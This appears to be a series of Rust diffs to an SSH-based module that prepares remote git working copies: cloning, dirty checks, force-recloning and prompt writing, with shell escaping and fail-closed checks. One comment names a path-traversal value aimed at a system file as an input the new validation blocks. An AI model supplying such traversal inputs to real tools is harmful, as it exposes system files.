+        Some(0) => {
+            let trimmed = stdout.trim();
+            if trimmed.is_empty() {
+                Ok(None)
+            } else {
+                Ok(Some(trimmed.to_owned()))
+            }
+        }
+        Some(255) => Err(format!(
+            "SSH transport/auth/host failure (exit 255): {}",
+            stderr.trim()
+        )),
+        Some(code) => Err(format!(
+            "remote origin probe failed (exit {code}): {}",
+            stderr.trim()
+        )),
+        None => Err("remote origin probe terminated by signal".to_owned()),
+    }
+}
+
+/// Sentinel printed by a remote predicate probe when the condition is true.
+const PREDICATE_TRUE: &str = "JEFE_PREDICATE_TRUE";
+/// Sentinel printed by a remote predicate probe when the condition is false.
+const PREDICATE_FALSE: &str = "JEFE_PREDICATE_FALSE";
+
+/// Classify the raw output of a sentinel-based remote predicate probe.
+///
+/// The probe script must always print exactly one sentinel
+/// (`JEFE_PREDICATE_TRUE` or `JEFE_PREDICATE_FALSE`) and exit 0. This pure
+/// classifier enforces the protocol:
+///
+/// - Exit 0 with trimmed stdout exactly `JEFE_PREDICATE_TRUE` → `Ok(true)`.
+/// - Exit 0 with trimmed stdout exactly `JEFE_PREDICATE_FALSE` → `Ok(false)`
+///   (a safe, normal false predicate — NOT an error).
+/// - SSH exit 255 → `Err` (transport/auth/host failure).
+/// - Any other nonzero exit → `Err` (sudo/shell/auth failure).
+/// - Exit 0 with prefix/suffix/both sentinels/empty/malformed output → `Err`
+///   (protocol mismatch or banner injection — never cause a clone).
+///
+/// This is **fail-closed**: any ambiguity is an `Err`, so infrastructure
+/// failures never masquerade as a safe `false` predicate.
+pub fn classify_predicate_output(
+    exit_code: Option<i32>,
+    stdout: &str,
+    stderr: &str,
+) -> Result<bool, String> {
+    match exit_code {
+        Some(0) => {
+            let trimmed = stdout.trim();
+            if trimmed == PREDICATE_TRUE {
+                Ok(true)
+            } else if trimmed == PREDICATE_FALSE {
+                Ok(false)
+            } else {
+                Err(format!(
+                    "remote predicate returned unexpected output (expected exactly one sentinel): \
+                     stdout={stdout:?} stderr={stderr:?}"
+                ))
+            }
+        }
+        Some(255) => Err(format!(
+            "SSH transport/auth/host failure (exit 255): {}",
+            stderr.trim()
+        )),
+        Some(code) => Err(format!(
+            "remote predicate probe failed (exit {code}): {}",
+            stderr.trim()
+        )),
+        None => Err("remote predicate probe terminated by signal".to_owned()),
+    }
+}
+
+/// Wrap a condition command in the sentinel protocol so it always exits 0
+/// (shell success) after printing exactly one sentinel.
+///
+/// The wrapped script runs `<condition>` and prints `JEFE_PREDICATE_TRUE`
+/// when it succeeds or `JEFE_PREDICATE_FALSE` when it fails — in both cases
+/// the script itself exits 0. This lets the caller distinguish a legitimate
+/// false predicate from an infrastructure failure via [`classify_predicate_output`].
+pub fn wrap_predicate(condition: &str) -> String {
+    format!(
+        "{{ {condition}; }} && printf '%s' {sentinel_true} || printf '%s' {sentinel_false}",
+        sentinel_true = shell_escape(PREDICATE_TRUE),
+        sentinel_false = shell_escape(PREDICATE_FALSE),
+    )
+}
+
+/// The live SSH runner. Executes the planned sequence against the real remote.
+pub(super) struct RemotePrepRunner {
+    remote: RemoteRepositorySettings,
+}
+
+impl RemotePrepRunner {
+    pub(super) fn new(remote: RemoteRepositorySettings) -> Self {
+        Self { remote }
+    }
+
+    /// Execute the remote prep sequence.
+    ///
+    /// Determined at runtime by querying the remote host: detect whether the
+    /// work dir is a git worktree, then branch accordingly.
+    pub(super) fn run(
+        &self,
+        work_dir: &Path,
+        identity: Option<&CloneIdentity>,
+        policy: DirtyPolicy,
+        prompt: &str,
+    ) -> Result<PrepOutcome, String> {
+        let escaped_work = shell_escape(&work_dir.to_string_lossy());
+
+        // 1. Detect git worktree on the remote. Use `git -C rev-parse
+        // --is-inside-work-tree` instead of `test -d .git` to support linked
+        // worktrees where `.git` is a file, not a directory.
+        let exists = self.run_remote_check(&format!("test -d {escaped_work}"))?;
+        if exists {
+            let is_git = self.run_remote_check(&format!(
+                "git -C {escaped_work} rev-parse --is-inside-work-tree 2>/dev/null | grep -qx true"
+            ))?;
+            if !is_git {
+                return Err(format!(
+                    "Remote path {} exists but is not a git worktree",
+                    work_dir.display()
+                ));
+            }
+            // Origin-mismatch check: only when an expected shortform is
+            // configured (identity present).
+            if let Some(id) = identity {
+                if let Some(mismatch) = self.remote_origin_mismatch(work_dir, id)? {
+                    return Ok(mismatch);
+                }
+            }
+        } else {
+            // 2. Clone if missing.
+            let Some(id) = identity else {
+                return Err(format!(
+                    "Remote working copy {} does not exist and no valid github_repo \
+                     (owner/repo) is configured to clone from.",
+                    work_dir.display()
+                ));
+            };
+            let url = id.clone_url();
+            let script = format!(
+                "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
+                mkdir_parent = mkdir_parent_for(work_dir),
+                url = shell_escape(&url),
+            );
+            self.run_wrapped(&script)?;
+        }
+
+        // 3. Dirty check (only meaningful if the worktree pre-existed).
+        let dirty_script = format!("cd {escaped_work}; git status --porcelain=v1");
+        let porcelain = self.run_wrapped_capture(&dirty_script)?;
+        let dirty = super::super::issue_git_prep::porcelain_is_dirty(&porcelain);
+
+        if dirty {
+            match policy {
+                DirtyPolicy::Stop => return Ok(PrepOutcome::Dirty),
+                DirtyPolicy::Discard => {
+                    let script = format!(
+                        "set -e; cd {escaped_work}; \
+                         git reset --hard; \
+                         git clean -fd -e {jefe} -e {jefe_glob} -e {llx} -e {llx_glob}",
+                        jefe = shell_escape(".jefe/"),
+                        jefe_glob = shell_escape(".jefe/**"),
+                        llx = shell_escape(".llxprt/"),
+                        llx_glob = shell_escape(".llxprt/**"),
+                    );
+                    self.run_wrapped(&script)?;
+                }
+            }
+        }
+
+        // 4. Resolve default branch + fetch + checkout. The checkout uses a
+        // fallback to reset --hard ONLY when the worktree is already on the
+        // desired default branch (linked worktrees cannot check out a branch
+        // already used elsewhere). If the worktree is on a different branch,
+        // reset --hard would move the wrong branch ref — so we fail with a
+        // clear error instead.
+        let script = format!(
+            "set -e; cd {escaped_work}; \
+             branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
+             git fetch origin \"$branch\"; \
+             if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
+                 :; \
+             elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
+                 git reset --hard \"origin/$branch\"; \
+             else \
+                 echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
+                 exit 1; \
+             fi",
+        );
+        self.run_wrapped(&script)?;
+
+        // 5. mkdir .jefe + write prompt via stdin.
+        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
+        let prompt_path =
+            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
+        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
+        self.run_wrapped_stdin(&script, prompt.as_bytes())?;
+
+        Ok(PrepOutcome::Ready)
+    }
+
+    /// Check if the remote workdir's origin matches the configured identity.
+    ///
+    /// Returns `Ok(Some(OriginMismatch))` when the origin does not match (or
+    /// there is no origin remote while an expected shortform IS configured).
+    /// Returns `Ok(None)` when the origin matches. Only called when an
+    /// identity is present.
+    ///
+    /// Uses the **host-aware** `origins_match` from `issue_git_prep` so a
+    /// foreign host (GitLab, attacker) with the same `owner/repo` is rejected.
+    fn remote_origin_mismatch(
+        &self,
+        work_dir: &Path,
+        identity: &CloneIdentity,
+    ) -> Result<Option<PrepOutcome>, String> {
+        let expected = identity.expected_shortform();
+        let origin_url = self.read_remote_origin_url(work_dir)?;
+        match origin_url.as_deref() {
+            Some(raw_url) => {
+                if super::super::issue_git_prep::origins_match(raw_url, expected) {
+                    Ok(None)
+                } else {
+                    let actual = jefe::git_info::parse_origin_url(raw_url).unwrap_or_default();
+                    Ok(Some(PrepOutcome::OriginMismatch {
+                        actual,
+                        expected: expected.to_owned(),
+                    }))
+                }
+            }
+            None => Ok(Some(PrepOutcome::OriginMismatch {
+                actual: String::new(),
+                expected: expected.to_owned(),
+            })),
+        }
+    }
+
+    /// Read the raw `origin` remote URL on the remote host, returning `None`
+    /// when the remote has no `origin` remote.
+    ///
+    /// Uses `run_remote_capture_raw` + [`classify_origin_url_output`] so a
+    /// missing `origin` remote (git exit nonzero, swallowed by the script)
+    /// returns `Ok(None)`, while genuine SSH/sudo/shell failures (exit 255
+    /// or other nonzero from the transport layer) propagate as `Err`.
+    ///
+    /// The probe script runs `git -C <work> remote get-url origin` and maps
+    /// the exit code: git returns exit **2** specifically when the `origin`
+    /// remote is absent, while config/permission/infrastructure failures use
+    /// other codes (e.g. 128). The wrapper turns exit-2 into empty stdout
+    /// (→ `Ok(None)`, the safe no-origin case) while letting any other
+    /// nonzero exit propagate so genuine failures surface as `Err` rather
+    /// than masquerading as "no origin" (which could mislead the user into
+    /// authorizing a destructive reclone).
+    fn read_remote_origin_url(&self, work_dir: &Path) -> Result<Option<String>, String> {
+        let escaped_work = shell_escape(&work_dir.to_string_lossy());
+        // Map git's exit-2 (no origin remote) to empty stdout; propagate any
+        // other nonzero exit so the classifier reports it as an error. The
+        // shell `$` variables are in a raw concatenation so `format!` does
+        // not mistake them for interpolation; only `{escaped_work}` is
+        // interpolated.
+        let probe = format!(
+            concat!(
+                "out=$(git -C {w} remote get-url origin 2>/dev/null); code=$?; ",
+                "if [ \"$code\" -eq 0 ]; then printf '%s' \"$out\"; ",
+                "elif [ \"$code\" -eq 2 ]; then printf ''; ",
+                "else exit \"$code\"; fi",
+            ),
+            w = escaped_work,
+        );
+        let script = wrap_effective_user(&self.remote, &probe);
+        let output = self.run_remote_capture_raw(&script)?;
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        let stderr = String::from_utf8_lossy(&output.stderr);
+        classify_origin_url_output(output.status.code(), &stdout, &stderr)
+    }
+
+    /// Force-reclone a mismatched remote workdir: resolve URL → rm → clone →
+    /// post-clone prep (no dirty-check — fresh clone is clean).
+    ///
+    /// **Ordering invariant (MUST-FIX #2):** the clone URL is resolved from
+    /// the required `identity` BEFORE the `rm -rf`. Since `identity` is a
+    /// non-optional `&CloneIdentity`, removal can never happen without a
+    /// valid replacement URL.
+    pub(super) fn run_force_reclone(
+        &self,
+        work_dir: &Path,
+        identity: &CloneIdentity,
+        prompt: &str,
+    ) -> Result<PrepOutcome, String> {
+        let escaped_work = shell_escape(&work_dir.to_string_lossy());
+
+        // 1. Resolve the clone URL BEFORE any destructive action.
+        let url = identity.clone_url();
+
+        // 2. Remove the mismatched workdir.
+        let rm_script = format!("rm -rf {escaped_work}");
+        self.run_wrapped(&rm_script)?;
+
+        // 3. Clone from the resolved URL.
+        let clone_script = format!(
+            "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
+            mkdir_parent = mkdir_parent_for(work_dir),
+            url = shell_escape(&url),
+        );
+        self.run_wrapped(&clone_script)?;
+
+        // 3. Post-clone prep: resolve default branch + fetch + checkout.
+        let checkout_script = format!(
+            "set -e; cd {escaped_work}; \
+             branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
+             git fetch origin \"$branch\"; \
+             if git checkout -B \"$branch\" \"origin/$branch\" -- 2>/dev/null; then \
+                 :; \
+             elif [ \"$(git rev-parse --abbrev-ref HEAD)\" = \"$branch\" ]; then \
+                 git reset --hard \"origin/$branch\"; \
+             else \
+                 echo \"Cannot reset to origin/$branch: worktree is on a different branch\" >&2; \
+                 exit 1; \
+             fi",
+        );
+        self.run_wrapped(&checkout_script)?;
+
+        // 4. mkdir .jefe + write prompt via stdin.
+        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
+        let prompt_path =
+            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
+        let prompt_script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
+        self.run_wrapped_stdin(&prompt_script, prompt.as_bytes())?;
+
+        Ok(PrepOutcome::Ready)
+    }
+
+    /// Write a prompt file to the remote host at `work_dir/{relative_path}`
+    /// via `ssh -T`, piping prompt bytes through stdin.
+    ///
+    /// This is the reusable remote write used by [`write_prompt_to_target`]
+    /// for both issue and PR prompts. It does NOT clone, check dirty, or
+    /// switch branches — it only creates `.jefe/` and writes the file.
+    pub(super) fn write_prompt(
+        &self,
+        work_dir: &Path,
+        relative_path: &str,
+        prompt_bytes: &[u8],
+    ) -> Result<(), String> {
+        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
+        let prompt_path = shell_escape(&work_dir.join(relative_path).to_string_lossy());
+        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
+        self.run_wrapped_stdin(&script, prompt_bytes)
+    }
+
+    /// Run a wrapped (effective-user) remote command requiring success.
+    fn run_wrapped(&self, script: &str) -> Result<(), String> {
+        let wrapped = wrap_effective_user(&self.remote, script);
+        self.run_remote(&wrapped)
+    }
+
+    /// Run a wrapped remote command and capture stdout.
+    fn run_wrapped_capture(&self, script: &str) -> Result<String, String> {
+        let wrapped = wrap_effective_user(&self.remote, script);
+        self.run_remote_capture(&wrapped)
+    }
+
+    /// Run a wrapped remote command with stdin bytes.
+    fn run_wrapped_stdin(&self, script: &str, stdin: &[u8]) -> Result<(), String> {
+        let wrapped = wrap_effective_user(&self.remote, script);
+        self.run_remote_stdin(&wrapped, stdin)
+    }
+
+    /// Run a remote predicate probe under the effective user and return its
+    /// boolean result.
+    ///
+    /// The condition is wrapped in the sentinel protocol via
+    /// [`wrap_predicate`]: the script always exits 0 after printing exactly
+    /// `JEFE_PREDICATE_TRUE` or `JEFE_PREDICATE_FALSE`. The result is
+    /// classified by [`classify_predicate_output`], which is **fail-closed**:
+    ///
+    /// - Exit 0 + exactly `JEFE_PREDICATE_TRUE` → `Ok(true)`.
+    /// - Exit 0 + exactly `JEFE_PREDICATE_FALSE` → `Ok(false)` (safe false).
+    /// - SSH exit 255 / auth / host / sudo / shell failure (any nonzero) /
+    ///   malformed/extra output → `Err`.
+    ///
+    /// This replaces the old blanket `nonzero = false` which conflated
+    /// infrastructure failures with a legitimate missing-path predicate.
+    fn run_remote_check(&self, condition: &str) -> Result<bool, String> {
+        let predicate = wrap_predicate(condition);
+        let wrapped = wrap_effective_user(&self.remote, &predicate);
+        let output = self.run_remote_capture_raw(&wrapped)?;
+        let stdout = String::from_utf8_lossy(&output.stdout);
+        let stderr = String::from_utf8_lossy(&output.stderr);
+        classify_predicate_output(output.status.code(), &stdout, &stderr)
+    }
+
+    /// Run a remote command requiring success.
+    fn run_remote(&self, remote_command: &str) -> Result<(), String> {
+        let output = self.run_remote_capture_raw(remote_command)?;
+        if output.status.success() {
+            Ok(())
+        } else {
+            Err(remote_failure_message(
+                &self.remote,
+                remote_command,
+                &output,
+            ))
+        }
+    }
+
+    /// Run a remote command and capture stdout as a string.
+    fn run_remote_capture(&self, remote_command: &str) -> Result<String, String> {
+        let output = self.run_remote_capture_raw(remote_command)?;
+        if output.status.success() {
+            Ok(String::from_utf8_lossy(&output.stdout).into_owned())
+        } else {
+            Err(remote_failure_message(
+                &self.remote,
+                remote_command,
+                &output,
+            ))
+        }
+    }
+
+    /// Run a remote command with prompt bytes piped via stdin.
+    fn run_remote_stdin(&self, remote_command: &str, stdin_bytes: &[u8]) -> Result<(), String> {
+        use std::io::Write;
+        let mut child = self
+            .ssh_command(remote_command)
+            .stdin(Stdio::piped())
+            .stdout(Stdio::piped())
+            .stderr(Stdio::piped())
+            .spawn()
+            .map_err(|e| format!("failed to spawn ssh: {e}"))?;
+        if let Some(mut stdin) = child.stdin.take() {
+            stdin
+                .write_all(stdin_bytes)
+                .map_err(|e| format!("failed to write prompt via stdin: {e}"))?;
+        }
+        let output = child
+            .wait_with_output()
+            .map_err(|e| format!("ssh failed: {e}"))?;
+        if output.status.success() {
+            Ok(())
+        } else {
+            Err(remote_failure_message(
+                &self.remote,
+                remote_command,
+                &output,
+            ))
+        }
+    }
+
+    /// Run a remote command capturing output (raw). Returns `Err` only on SSH
+    /// spawn failure (a transport/infrastructure error); a non-zero remote
+    /// exit status is returned as `Ok(output)` so callers can distinguish
+    /// predicate results from transport failures.
+    fn run_remote_capture_raw(&self, remote_command: &str) -> Result<std::process::Output, String> {
+        self.ssh_command(remote_command)
+            .stdout(Stdio::piped())
+            .stderr(Stdio::piped())
+            .output()
+            .map_err(|e| {
+                format!(
+                    "SSH transport failure to {}@{}: {e}",
+                    self.remote.login_user.trim(),
+                    self.remote.host.trim()
+                )
+            })
+    }
+
+    /// Build the `ssh -T` command for a remote script.
+    fn ssh_command(&self, remote_command: &str) -> Command {
+        let mut cmd = Command::new("ssh");
+        cmd.args(["-o", "BatchMode=yes", "-o", "ConnectTimeout=10", "-T", "--"]);
+        cmd.arg(format!(
+            "{}@{}",
+            self.remote.login_user.trim(),
+            self.remote.host.trim()
+        ));
+        cmd.arg(remote_command);
+        cmd
+    }
+}
+
+/// Build the `mkdir -p $(dirname work)` prefix for a clone, or empty if no
+/// parent.
+fn mkdir_parent_for(work_dir: &Path) -> String {
+    match work_dir.parent() {
+        Some(parent) if !parent.as_os_str().is_empty() => {
+            format!("mkdir -p {};", shell_escape(&parent.to_string_lossy()))
+        }
+        _ => String::new(),
+    }
+}
+
+/// Wrap a remote command in the effective-user switch (`sudo -n su - <user>
+/// -c '...'`) when `run_as_user` differs from `login_user`. Mirrors
+/// `runtime::commands::remote_tmux_command` so the effective-user behavior is
+/// consistent between prep and tmux operations.
+fn wrap_effective_user(remote: &RemoteRepositorySettings, command: &str) -> String {
+    let effective = if remote.run_as_user.trim().is_empty() {
+        remote.login_user.trim()
+    } else {
+        remote.run_as_user.trim()
+    };
+    if effective == remote.login_user.trim() {
+        command.to_owned()
+    } else {
+        format!(
+            "sudo -n su - {} -c {}",
+            shell_escape(effective),
+            shell_escape(command),
+        )
+    }
+}
+
+/// Format a remote command failure message from a captured output.
+fn remote_failure_message(
+    remote: &RemoteRepositorySettings,
+    command: &str,
+    output: &std::process::Output,
+) -> String {
+    let stderr = String::from_utf8_lossy(&output.stderr).trim().to_owned();
+    let stdout = String::from_utf8_lossy(&output.stdout).trim().to_owned();
+    let detail = if !stderr.is_empty() {
+        stderr
+    } else if !stdout.is_empty() {
+        stdout
+    } else {
+        format!("exit status {}", output.status)
+    };
+    format!(
+        "remote prep on {}@{} failed ({command}): {detail}",
+        remote.login_user.trim(),
+        remote.host.trim(),
+    )
+}
+
+/// Shell-escape a single-quoted string (mirrors
+/// `runtime::commands::shell_escape_single`).
+pub(super) fn shell_escape(value: &str) -> String {
+    format!("'{}'", value.replace('\'', r"'\''"))
+}
+
+#[cfg(test)]
+#[path = "issue_prep_remote_tests.rs"]
+mod tests;

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -119,15 +119,21 @@ impl RemotePrepPlanner {
 
         // 1. Clone if missing.
         if inputs.presence == WorkdirPresence::Absent {
-            // Path absent → clone if identity present.
-            if let Some(id) = identity {
-                let url = id.clone_url();
-                let script = format!(
-                    "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
-                    mkdir_parent = mkdir_parent_for(work_dir),
-                    url = shell_escape(&url),
-                );
-                ops.push(self.wrapped_ssh_op(&script, None));
+            // Path absent → clone if identity present. If no identity is
+            // available, the live runner returns Err and no further ops run;
+            // mirror that here so the planner cannot emit checkout/prompt
+            // operations against a path that was never created.
+            match identity {
+                Some(id) => {
+                    let url = id.clone_url();
+                    let script = format!(
+                        "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
+                        mkdir_parent = mkdir_parent_for(work_dir),
+                        url = shell_escape(&url),
+                    );
+                    ops.push(self.wrapped_ssh_op(&script, None));
+                }
+                None => return ops,
             }
         }
 
@@ -302,6 +308,7 @@ impl RemotePrepPlanner {
 /// caller can return `OriginMismatch` (a git repo with no `origin` while an
 /// expected shortform IS configured is a mismatch — see
 /// [`super::remote_origin_mismatch`]).
+#[must_use = "the origin classification distinguishes Ok(Some)/Ok(None)/Err; ignoring Err conflates an SSH/auth failure with a missing origin"]
 pub fn classify_origin_url_output(
     exit_code: Option<i32>,
     stdout: &str,
@@ -349,6 +356,7 @@ const PREDICATE_FALSE: &str = "JEFE_PREDICATE_FALSE";
 ///
 /// This is **fail-closed**: any ambiguity is an `Err`, so infrastructure
 /// failures never masquerade as a safe `false` predicate.
+#[must_use = "the predicate classification distinguishes Ok(true)/Ok(false)/Err; ignoring Err conflates an SSH/auth failure with a safe false"]
 pub fn classify_predicate_output(
     exit_code: Option<i32>,
     stdout: &str,
@@ -532,7 +540,14 @@ impl RemotePrepRunner {
                 if super::super::issue_git_prep::origins_match(raw_url, expected) {
                     Ok(None)
                 } else {
-                    let actual = jefe::git_info::parse_origin_url(raw_url).unwrap_or_default();
+                    // Display the normalized owner/repo when it parses, else
+                    // the raw URL — so a malformed/unexpected origin (not
+                    // just a missing one) surfaces a diagnosable actual value
+                    // rather than an empty string indistinguishable from
+                    // "no origin".
+                    let actual = jefe::git_info::parse_origin_url(raw_url)
+                        .filter(|s| !s.is_empty())
+                        .unwrap_or_else(|| raw_url.to_owned());
                     Ok(Some(PrepOutcome::OriginMismatch {
                         actual,
                         expected: expected.to_owned(),
@@ -592,6 +607,15 @@ impl RemotePrepRunner {
     /// the required `identity` BEFORE the `rm -rf`. Since `identity` is a
     /// non-optional `&CloneIdentity`, removal can never happen without a
     /// valid replacement URL.
+    ///
+    /// **Partial-failure note:** if the `git clone` fails after the `rm -rf`
+    /// (network/auth/disk error), the existing workdir is already destroyed
+    /// and this returns `Err`. The user explicitly confirmed the replacement
+    /// via the `ConfirmIssueOriginMismatch` modal, and recovery is to retry
+    /// the send (which will clone fresh from the resolved URL). The
+    /// remove-then-clone ordering is defined by issue #190; a fully
+    /// transactional clone-to-temp-then-atomic-swap is intentionally out of
+    /// scope here.
     pub(super) fn run_force_reclone(
         &self,
         work_dir: &Path,

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -181,8 +181,12 @@ impl RemotePrepPlanner {
             );
             ops.push(self.wrapped_ssh_op(&script, None));
 
-            // 5. mkdir .jefe + write prompt via stdin (cat > file).
-            let prompt_path = format!("{escaped_work}/{ISSUE_PROMPT_RELATIVE_PATH}");
+            // 5. mkdir .jefe + write prompt via stdin (cat > file). Escape
+            // the full joined prompt path (consistent with plan_force_reclone
+            // and the live run() path) so a metacharacter in the work dir or
+            // the constant can never break the shell command.
+            let prompt_path =
+                shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
             let script = format!(
                 "set -e; mkdir -p {jefe_dir}; cat > {prompt_path}",
                 jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy()),

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -399,6 +399,15 @@ pub fn classify_predicate_output(
 /// when it succeeds or `JEFE_PREDICATE_FALSE` when it fails — in both cases
 /// the script itself exits 0. This lets the caller distinguish a legitimate
 /// false predicate from an infrastructure failure via [`classify_predicate_output`].
+///
+/// # Escaping contract
+///
+/// `condition` is interpolated verbatim into the shell script. Callers MUST
+/// pre-shell-escape any dynamic content (paths, remote-supplied values) via
+/// [`shell_escape`] before passing it here. All current call sites pass
+/// pre-escaped literals or `shell_escape`-d values. The function lives in a
+/// private module and is re-exported only `pub(super)` to `app_input`, so no
+/// code outside that boundary can reach it with untrusted input.
 pub fn wrap_predicate(condition: &str) -> String {
     format!(
         "{{ {condition}; }} && printf '%s' {sentinel_true} || printf '%s' {sentinel_false}",
@@ -470,7 +479,11 @@ impl RemotePrepRunner {
         }
 
         // 3. Dirty check (only meaningful if the worktree pre-existed).
-        let dirty_script = format!("cd {escaped_work}; git status --porcelain=v1");
+        // `set -e` makes the script fail fast if `cd` fails (e.g., a TOCTOU
+        // race that removed the dir between the existence check and here),
+        // so `git status` can never run in the wrong directory and produce a
+        // misleading porcelain result.
+        let dirty_script = format!("set -e; cd {escaped_work}; git status --porcelain=v1");
         let porcelain = self.run_wrapped_capture(&dirty_script)?;
         let dirty = super::super::issue_git_prep::porcelain_is_dirty(&porcelain);
 
@@ -626,6 +639,12 @@ impl RemotePrepRunner {
         identity: &CloneIdentity,
         prompt: &str,
     ) -> Result<PrepOutcome, String> {
+        // Defense-in-depth: refuse catastrophic targets (root, empty,
+        // top-level entry) even though the user confirmed. This runs BEFORE
+        // constructing the rm -rf shell command so a misconfigured work_dir
+        // can never reach the remote shell.
+        super::super::issue_git_prep::validate_reclone_target(work_dir)?;
+
         let escaped_work = shell_escape(&work_dir.to_string_lossy());
 
         // 1. Resolve the clone URL BEFORE any destructive action.

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -96,25 +96,39 @@ impl RemotePrepPlanner {
     /// This is pure — it does not inspect the remote filesystem. Callers
     /// supply `presence`, `is_dirty`, and `origin_mismatch` to drive the
     /// branching deterministically.
-    #[must_use]
-    pub(super) fn plan(&self, inputs: &PlanInputs<'_>) -> Vec<PlannedRemoteOp> {
+    ///
+    /// Returns `Err` with a static reason when the planned state is a hard
+    /// error in the live runner (e.g. `WorkdirPresence::NotGit`), so tests can
+    /// assert that the planner and runner agree on the error path rather than
+    /// the planner silently emitting an empty plan.
+    pub(super) fn plan(
+        &self,
+        inputs: &PlanInputs<'_>,
+    ) -> Result<Vec<PlannedRemoteOp>, &'static str> {
         let mut ops = Vec::new();
         let escaped_work = shell_escape(&inputs.work_dir.to_string_lossy());
-        let is_git = inputs.presence == WorkdirPresence::Git;
         let PlanInputs {
             work_dir,
             identity,
             policy,
-            presence: _,
+            presence,
             is_dirty,
             origin_mismatch,
             prompt,
         } = inputs;
+        let is_git = *presence == WorkdirPresence::Git;
+
+        // NotGit is a hard error in the live runner (exists but is not a git
+        // worktree): encode it here rather than emitting an empty plan, so a
+        // planner/runner divergence would be caught by tests.
+        if *presence == WorkdirPresence::NotGit {
+            return Err("exists but is not a git worktree");
+        }
 
         // Origin mismatch short-circuits before any destructive op, mirroring
         // the Dirty+Stop short-circuit. The caller opens the confirm modal.
         if is_git && *origin_mismatch {
-            return ops;
+            return Ok(ops);
         }
 
         // 1. Clone if missing.
@@ -133,12 +147,13 @@ impl RemotePrepPlanner {
                     );
                     ops.push(self.wrapped_ssh_op(&script, None));
                 }
-                None => return ops,
+                None => return Ok(ops),
             }
         }
 
-        // 2. Dirty check.
-        if inputs.presence != WorkdirPresence::NotGit {
+        // 2. Dirty check. NotGit was already handled above as a hard error,
+        // so this branch covers Git (pre-existing) and Absent (just cloned).
+        {
             // After clone the worktree is clean; only check dirty when it
             // pre-existed as a git worktree.
             if is_git && *is_dirty {
@@ -146,7 +161,7 @@ impl RemotePrepPlanner {
                     DirtyPolicy::Stop => {
                         // Stop: no further ops. The caller opens the confirm
                         // modal; no reset/clean is planned.
-                        return ops;
+                        return Ok(ops);
                     }
                     DirtyPolicy::Discard => {
                         // Discard: reset --hard + clean -fd with exclusions.
@@ -195,7 +210,7 @@ impl RemotePrepPlanner {
             ops.push(self.wrapped_ssh_op(&script, Some((*prompt).to_owned())));
         }
 
-        ops
+        Ok(ops)
     }
 
     /// Plan the force-reclone sequence: resolve URL → rm → clone → checkout →
@@ -562,7 +577,7 @@ impl RemotePrepRunner {
                     // just a missing one) surfaces a diagnosable actual value
                     // rather than an empty string indistinguishable from
                     // "no origin".
-                    let actual = jefe::git_info::parse_origin_url(raw_url)
+                    let actual = jefe::git_info::origin_display_shortform(raw_url)
                         .filter(|s| !s.is_empty())
                         .unwrap_or_else(|| raw_url.to_owned());
                     Ok(Some(PrepOutcome::OriginMismatch {
@@ -654,15 +669,19 @@ impl RemotePrepRunner {
         let rm_script = format!("rm -rf {escaped_work}");
         self.run_wrapped(&rm_script)?;
 
+        // Any failure from here (clone or prep) occurs AFTER the original
+        // workdir has been destroyed. Annotate the error so the user knows
+        // their data is already gone and which step failed.
         // 3. Clone from the resolved URL.
         let clone_script = format!(
             "set -e; {mkdir_parent} git clone -- {url} {escaped_work}",
             mkdir_parent = mkdir_parent_for(work_dir),
             url = shell_escape(&url),
         );
-        self.run_wrapped(&clone_script)?;
+        self.run_wrapped(&clone_script)
+            .map_err(|e| format!("After removing the mismatched remote work_dir, the clone failed (the original working copy at {} is already gone): {e}", work_dir.display()))?;
 
-        // 3. Post-clone prep: resolve default branch + fetch + checkout.
+        // 4. Post-clone prep: resolve default branch + fetch + checkout.
         let checkout_script = format!(
             "set -e; cd {escaped_work}; \
              branch=$(git symbolic-ref refs/remotes/origin/HEAD | sed 's@^refs/remotes/origin/@@'); \
@@ -676,7 +695,8 @@ impl RemotePrepRunner {
                  exit 1; \
              fi",
         );
-        self.run_wrapped(&checkout_script)?;
+        self.run_wrapped(&checkout_script)
+            .map_err(|e| format!("After force-recloning {} remotely (the original working copy is already gone), post-clone prep failed: {e}", work_dir.display()))?;
 
         // 4. mkdir .jefe + write prompt via stdin.
         let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
@@ -700,6 +720,11 @@ impl RemotePrepRunner {
         relative_path: &str,
         prompt_bytes: &[u8],
     ) -> Result<(), String> {
+        // Defense-in-depth: validate the relative path even though current
+        // call sites pass the safe ISSUE_PROMPT_RELATIVE_PATH constant. This
+        // guards against future misuse of this pub(super) API with a
+        // traversal value (e.g. ../../etc/passwd) that would escape work_dir.
+        super::validate_prompt_relative_path(relative_path)?;
         let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
         let prompt_path = shell_escape(&work_dir.join(relative_path).to_string_lossy());
         let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");

--- a/src/app_input/issue_prep_remote_tests.rs
